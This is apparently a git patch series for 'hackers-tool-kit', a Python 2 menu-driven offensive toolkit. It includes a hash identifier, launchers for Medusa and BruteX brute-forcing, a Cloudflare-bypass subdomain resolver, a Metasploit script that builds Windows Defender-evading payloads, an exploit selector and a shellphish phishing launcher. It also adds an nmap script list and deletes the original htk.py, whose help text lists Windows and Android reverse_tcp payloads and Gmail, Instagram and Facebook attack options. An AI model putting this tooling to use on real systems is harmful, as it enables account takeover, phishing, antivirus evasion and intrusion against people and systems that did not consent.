hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') + os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') + os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) + os.system('echo "run\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> handler.rc'.format(f)) + os.system('echo "show options\n" >> handler.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> handler.rc') + os.system('echo "services\n" >> handler.rc') + os.system("service postgresql restart") + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + found = True +mainbanner() +main() From 1787d14f4f60a828e729d8767720f09b0ed120e8 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 22 Feb 2019 19:39:27 +0100 Subject: [PATCH 021/214] Add files via upload --- tools/scripts.txt | 295 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 295 insertions(+) create mode 100644 tools/scripts.txt diff --git a/tools/scripts.txt b/tools/scripts.txt new file mode 100644 index 0000000..8554fb4 --- /dev/null +++ b/tools/scripts.txt @@ -0,0 +1,295 @@ +acarsd-info ip-forwarding +address-info ip-geolocation-geoplugin +afp-brute ip-geolocation-ipinfodb +afp-ls ip-geolocation-map-bing +afp-path-vuln ip-geolocation-map-google +afp-serverinfo ip-geolocation-map-kml +afp-showmount ip-geolocation-maxmind +ajp-auth ip-https-discover +ajp-brute ipidseq +ajp-headers ipmi-brute +ajp-methods ipmi-cipher-zero +ajp-request ipmi-version +allseeingeye-info ipv6-multicast-mld-list +amqp-info ipv6-node-info +asn-query ipv6-ra-flood +auth-owners irc-botnet-channels +auth-spoof irc-brute +backorifice-brute irc-info +backorifice-info irc-sasl-brute +bacnet-info irc-unrealircd-backdoor +banner iscsi-brute +bitcoin-getaddr iscsi-info +bitcoin-info isns-info +bitcoinrpc-info jdwp-exec +bittorrent-discovery jdwp-info +bjnp-discover jdwp-inject +broadcast-ataoe-discover jdwp-version +broadcast-avahi-dos knx-gateway-discover +broadcast-bjnp-discover knx-gateway-info +broadcast-db2-discover krb5-enum-users +broadcast-dhcp6-discover ldap-brute +broadcast-dhcp-discover ldap-novell-getpass +broadcast-dns-service-discovery ldap-rootdse +broadcast-dropbox-listener ldap-search +broadcast-eigrp-discovery lexmark-config +broadcast-igmp-discovery llmnr-resolve +broadcast-listener lltd-discovery +broadcast-ms-sql-discover maxdb-info +broadcast-netbios-master-browser mcafee-epo-agent +broadcast-networker-discover membase-brute +broadcast-novell-locate membase-http-info +broadcast-ospf2-discover memcached-info +broadcast-pc-anywhere metasploit-info +broadcast-pc-duo metasploit-msgrpc-brute +broadcast-pim-discovery metasploit-xmlrpc-brute +broadcast-ping mikrotik-routeros-brute +broadcast-pppoe-discover mmouse-brute +broadcast-rip-discover mmouse-exec +broadcast-ripng-discover modbus-discover +broadcast-sonicwall-discover mongodb-brute +broadcast-sybase-asa-discover mongodb-databases +broadcast-tellstick-discover mongodb-info +broadcast-upnp-info mqtt-subscribe +broadcast-versant-locate mrinfo +broadcast-wake-on-lan msrpc-enum +broadcast-wpad-discover ms-sql-brute +broadcast-wsdd-discover ms-sql-config +broadcast-xdmcp-discover ms-sql-dac +cassandra-brute ms-sql-dump-hashes +cassandra-info ms-sql-empty-password +cccam-version ms-sql-hasdbaccess +cics-enum ms-sql-info +cics-info ms-sql-ntlm-info +cics-user-brute ms-sql-query +cics-user-enum ms-sql-tables +citrix-brute-xml ms-sql-xp-cmdshell +citrix-enum-apps mtrace +citrix-enum-apps-xml murmur-version +citrix-enum-servers mysql-audit +citrix-enum-servers-xml mysql-brute +clamav-exec mysql-databases +clock-skew mysql-dump-hashes +coap-resources mysql-empty-password +couchdb-databases mysql-enum +couchdb-stats mysql-info +creds-summary mysql-query +cups-info mysql-users +cups-queue-info mysql-variables +cvs-brute mysql-vuln-cve2012-2122 +cvs-brute-repository nat-pmp-info +daap-get-library nat-pmp-mapport +daytime nbd-info +db2-das-info nbstat +deluge-rpc-brute ncp-enum-users +dhcp-discover ncp-serverinfo +dict-info ndmp-fs-info +distcc-cve2004-2687 ndmp-version +dns-blacklist nessus-brute +dns-brute nessus-xmlrpc-brute +dns-cache-snoop netbus-auth-bypass +dns-check-zone netbus-brute +dns-client-subnet-scan netbus-info +dns-fuzz netbus-version +dns-ip6-arpa-scan nexpose-brute +dns-nsec3-enum nfs-ls +dns-nsec-enum nfs-showmount +dns-nsid nfs-statfs +dns-random-srcport nje-node-brute +dns-random-txid nje-pass-brute +dns-recursion nntp-ntlm-info +dns-service-discovery nping-brute +dns-srv-enum nrpe-enum +dns-update ntp-info +dns-zeustracker ntp-monlist +dns-zone-transfer omp2-brute +docker-version omp2-enum-targets +domcon-brute omron-info +domcon-cmd openlookup-info +domino-enum-users openvas-otp-brute +dpap-brute openwebnet-discovery +drda-brute oracle-brute +drda-info oracle-brute-stealth +duplicates oracle-enum-users +eap-info oracle-sid-brute +enip-info oracle-tns-version +epmd-info ovs-agent-version +eppc-enum-processes p2p-conficker +fcrdns path-mtu +finger pcanywhere-brute +fingerprint-strings pcworx-info +firewalk pgsql-brute +firewall-bypass pjl-ready-message +flume-master-info pop3-brute +fox-info pop3-capabilities +freelancer-info pop3-ntlm-info +ftp-anon pptp-version +ftp-bounce puppet-naivesigning +ftp-brute qconn-exec +ftp-libopie qscan +ftp-proftpd-backdoor quake1-info +ftp-syst quake3-info +ftp-vsftpd-backdoor quake3-master-getservers +ftp-vuln-cve2010-4221 rdp-enum-encryption +ganglia-info rdp-vuln-ms12-020 +giop-info realvnc-auth-bypass +gkrellm-info redis-brute +gopher-ls redis-info +gpsd-info resolveall +hadoop-datanode-info reverse-index +hadoop-jobtracker-info rexec-brute +hadoop-namenode-info rfc868-time +hadoop-secondary-namenode-info riak-http-info +hadoop-tasktracker-info rlogin-brute +hbase-master-info rmi-dumpregistry +hbase-region-info rmi-vuln-classloader +hddtemp-info rpcap-brute +hnap-info rpcap-info +hostmap-bfk rpc-grind +hostmap-crtsh rpcinfo +hostmap-ip2hosts rsa-vuln-roca +hostmap-robtex rsync-brute +http-adobe-coldfusion-apsa1301 rsync-list-modules +http-affiliate-id rtsp-methods +http-apache-negotiation rtsp-url-brute +http-apache-server-status rusers +http-aspnet-debug s7-info +http-auth-finder samba-vuln-cve-2012-1182 +http-auth script.db +http-avaya-ipoffice-users servicetags +http-awstatstotals-exec shodan-api +http-axis2-dir-traversal sip-brute +http-backup-finder sip-call-spoof +http-barracuda-dir-traversal sip-enum-users +http-bigip-cookie sip-methods +http-brute skypev2-version +http-cakephp-version smb2-capabilities +http-chrono smb2-security-mode +http-cisco-anyconnect smb2-time +http-coldfusion-subzero smb2-vuln-uptime +http-comments-displayer smb-brute +http-config-backup smb-double-pulsar-backdoor +http-cookie-flags smb-enum-domains +http-cors smb-enum-groups +http-cross-domain-policy smb-enum-processes +http-csrf smb-enum-services +http-date smb-enum-sessions +http-default-accounts smb-enum-shares +http-devframework smb-enum-users +http-dlink-backdoor smb-flood +http-dombased-xss smb-ls +http-domino-enum-passwords smb-mbenum +http-drupal-enum smb-os-discovery +http-drupal-enum-users smb-print-text +http-enum smb-protocols +http-errors smb-psexec +http-exif-spider smb-security-mode +http-favicon smb-server-stats +http-feed smb-system-info +http-fetch smb-vuln-conficker +http-fileupload-exploiter smb-vuln-cve2009-3103 +http-form-brute smb-vuln-cve-2017-7494 +http-form-fuzzer smb-vuln-ms06-025 +http-frontpage-login smb-vuln-ms07-029 +http-generator smb-vuln-ms08-067 +http-git smb-vuln-ms10-054 +http-gitweb-projects-enum smb-vuln-ms10-061 +http-google-malware smb-vuln-ms17-010 +http-grep smb-vuln-regsvc-dos +http-headers smtp-brute +http-huawei-hg5xx-vuln smtp-commands +http-icloud-findmyiphone smtp-enum-users +http-icloud-sendmsg smtp-ntlm-info +http-iis-short-name-brute smtp-open-relay +http-iis-webdav-vuln smtp-strangeport +http-internal-ip-disclosure smtp-vuln-cve2010-4344 +http-joomla-brute smtp-vuln-cve2011-1720 +http-jsonp-detection smtp-vuln-cve2011-1764 +http-litespeed-sourcecode-download sniffer-detect +http-ls snmp-brute +http-majordomo2-dir-traversal snmp-hh3c-logins +http-malware-host snmp-info +http-mcmp snmp-interfaces +http-methods snmp-ios-config +http-method-tamper snmp-netstat +http-mobileversion-checker snmp-processes +http-ntlm-info snmp-sysdescr +http-open-proxy snmp-win32-services +http-open-redirect snmp-win32-shares +http-passwd snmp-win32-software +http-phpmyadmin-dir-traversal snmp-win32-users +http-phpself-xss socks-auth-info +http-php-version socks-brute +http-proxy-brute socks-open-proxy +http-put ssh2-enum-algos +http-qnap-nas-info ssh-auth-methods +http-referer-checker ssh-brute +http-rfi-spider ssh-hostkey +http-robots.txt ssh-publickey-acceptance +http-robtex-reverse-ip ssh-run +http-robtex-shared-ns sshv1 +http-security-headers ssl-ccs-injection +http-server-header ssl-cert-intaddr +http-shellshock ssl-cert +http-sitemap-generator ssl-date +http-slowloris-check ssl-dh-params +http-slowloris ssl-enum-ciphers +http-sql-injection ssl-heartbleed +http-stored-xss ssl-known-key +http-svn-enum ssl-poodle +http-svn-info sslv2-drown +http-title sslv2 +http-tplink-dir-traversal sstp-discover +http-trace stun-info +http-traceroute stun-version +http-trane-info stuxnet-detect +http-unsafe-output-escaping supermicro-ipmi-conf +http-useragent-tester svn-brute +http-userdir-enum targets-asn +http-vhosts targets-ipv6-map4to6 +http-virustotal targets-ipv6-multicast-echo +http-vlcstreamer-ls targets-ipv6-multicast-invalid-dst +http-vmware-path-vuln targets-ipv6-multicast-mld +http-vuln-cve2006-3392 targets-ipv6-multicast-slaac +http-vuln-cve2009-3960 targets-ipv6-wordlist +http-vuln-cve2010-0738 targets-sniffer +http-vuln-cve2010-2861 targets-traceroute +http-vuln-cve2011-3192 targets-xml +http-vuln-cve2011-3368 teamspeak2-version +http-vuln-cve2012-1823 telnet-brute +http-vuln-cve2013-0156 telnet-encryption +http-vuln-cve2013-6786 telnet-ntlm-info +http-vuln-cve2013-7091 tftp-enum +http-vuln-cve2014-2126 tls-alpn +http-vuln-cve2014-2127 tls-nextprotoneg +http-vuln-cve2014-2128 tls-ticketbleed +http-vuln-cve2014-2129 tn3270-screen +http-vuln-cve2014-3704 tor-consensus-checker +http-vuln-cve2014-8877 traceroute-geolocation +http-vuln-cve2015-1427 tso-brute +http-vuln-cve2015-1635 tso-enum +http-vuln-cve2017-1001000 unittest +http-vuln-cve2017-5638 unusual-port +http-vuln-cve2017-5689 upnp-info +http-vuln-cve2017-8917 url-snarf +http-vuln-misfortune-cookie ventrilo-info +http-vuln-wnr1000-creds versant-info +http-waf-detect vmauthd-brute +http-waf-fingerprint vmware-version +http-webdav-scan vnc-brute +http-wordpress-brute vnc-info +http-wordpress-enum vnc-title +http-wordpress-users voldemort-info +http-xssed vtam-enum +iax2-brute vuze-dht-info +iax2-version wdb-version +icap-info weblogic-t3-info +iec-identify whois-domain +ike-version whois-ip +imap-brute wsdd-discover +imap-capabilities x11-access +imap-ntlm-info xdmcp-discover +impress-remote-discover xmlrpc-methods +informix-brute xmpp-brute +informix-query xmpp-info +informix-tables From 25dc1e00cfef7fa7a58e06c1617aebf02432d67c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 05:57:44 +0100 Subject: [PATCH 022/214] Add files via upload --- tools/htkbanner.txt | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 tools/htkbanner.txt diff --git a/tools/htkbanner.txt b/tools/htkbanner.txt new file mode 100644 index 0000000..09deabe --- /dev/null +++ b/tools/htkbanner.txt @@ -0,0 +1,5 @@ + _ _ _ _ _ _ _ + | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ + | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| + | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ + |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__| From d342b0dee8ca07c98ef8ad610b92f971511959fc Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 05:58:01 +0100 Subject: [PATCH 023/214] Delete htk.py --- htk.py | 1976 -------------------------------------------------------- 1 file changed, 1976 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 32ad580..0000000 --- a/htk.py +++ /dev/null @@ -1,1976 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - print N+""" _ _ _ _ _ _ _ - _ _ _ _ _ _ _ - | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ - | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| - | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m - |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail 